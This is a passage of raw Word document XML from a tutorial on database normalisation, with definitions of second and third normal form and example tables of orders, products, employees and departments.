          <w:p w14:paraId="5CAB7A10"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Java</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="25C15C94" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F82E44"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3313A98A"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="145BEDE0"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Python</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="67865666" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06096812"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31EA26E6"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7EE30D68"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Java</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="430E185E" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AD7E91"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45DD4FA6"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="56457E60"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QL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EC9B2C8" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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0B11780">
          <v:rect id="_x0000_i2974" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC53F5"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2. Second Normal Form (2NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218DCBC7"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efinition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A table is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it satisfies the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF48D0" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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It is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46294441" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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It has no partial dependency, meaning all non-key attributes (columns) are fully dependent on the entire primary key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C52A5"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Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eliminate partial dependency (when a non-key attribute depends on a part of a composite primary key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176B6666"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Non-2NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (partial dependency exis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7"/>
        <w:gridCol w:w="1026"/>
        <w:gridCol w:w="1371"/>
        <w:gridCol w:w="882"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="7080B566" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E442475"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Order ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67376854"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Product ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53AA57D3"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Product Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F8166A"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Quantity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="24829593" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BC028B"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BBA44F9"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03F4B9F6"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Laptop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E8EBA01"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5AED41EF" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40B100BE"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617658C8"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1438CFBE"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Mouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="628672C1"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="25DF4385" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B075646"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43859D36"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77ECFC07"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Laptop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="598D8975"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="012DFC05"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In this case, Product Name depends only on Product ID, not the entire primary key (Order ID, Product ID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C29EFDB"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2NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (after splitting the table):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE38C8F"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Order Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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7"/>
        <w:gridCol w:w="1026"/>
        <w:gridCol w:w="882"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4E0479BC" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="679433BF"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Order ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B921282"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Product ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DDCE32F"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Quantity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="4679A3CD" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CBEFE49"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="662DF9F4"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CDAF1C4"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="222CF30D" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438DC0C5"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3029227B"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="351C8527"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="30B65FD0" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3174F0F2"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E4C48BB"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F8F1F72"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F866ABA"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Product Table</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>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1"/>
        <w:gridCol w:w="1386"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="75374D50" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42B95C4E"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Product ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C16E40A"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Product Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5C36AD02" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="659DF5AA"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77E6617B"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Laptop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="37A675DB" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38981359"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D2B0D35"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Mouse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="080436F7" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="00000000" w:rsidP="00393B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4DF5568">
          <v:rect id="_x0000_i2975" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD647E"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3. Third Normal Form (3NF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C5098C"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lastRenderedPageBreak/>
        <w:t>Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A table is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if it satisfies the following conditions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720BF62E" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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It is in </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF03700" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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It has no transitive dependency, meaning non-key attributes are not dependent on other non-key attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AD13E"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Goal</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Eliminate transitive dependency (when non-key attributes depend on other non-key attributes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBA13FB"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Non-3NF</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (transitive dependency exis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25"/>
        <w:gridCol w:w="1556"/>
        <w:gridCol w:w="1422"/>
        <w:gridCol w:w="1783"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="60DBCA07" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C9D89EF"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Employee ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32C15225"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Employee Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D791162"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Department ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="689CC26D"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Department Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="7909C1FE" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AE2671A"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A9A3441"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58D352FD"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E23A8A6"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IT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="5F515772" w14:textId="77777777" w:rsidTr="002C0B92">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06641760"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48E17925"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CF14DEC"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20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2047032B"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HR</w:t>
